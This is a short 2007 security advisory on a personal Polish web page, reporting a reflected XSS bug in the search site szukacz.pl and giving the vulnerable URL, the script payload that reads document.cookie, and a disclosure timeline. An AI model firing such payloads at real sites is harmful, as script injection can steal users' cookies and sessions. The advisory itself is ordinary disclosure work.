Zapraszam na bloga o botnetach i złośliwym oprogramowaniu:
bothunters.pl
kanedaaa... ... borys ... bohater ...
slackware - pakiety
faq
security
public
art
processing
linux moje
tests
linki
stats
start
kaneda@bohater.net
+
Subject:
XSS bug for www.szukacz.pl
+
Version:
2007.03.04
+
Discovered by:
Kanedaaa: http://kaneda.bohater.net
+
szukacz.pl Description:
Very useful polish search site.
+
Description:
XSS IN:
http://www.szukacz.pl/szukaj.aspx?enc=iso-8859-2&q=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&ct=polska
Sent data:
"><script>alert(document.cookie);</script>
Its nothing special, because this site is just search site without any kind of authentication.
Timeline:
2007.03.04 bug discovered
2007.03.04 "/" bug sent via mail from http://www.szukacz.pl
Original Advisory:
http://kaneda.bohater.net/security/20070304-xss-szukacz.pl.php
Check my other bugs in security section:
Security
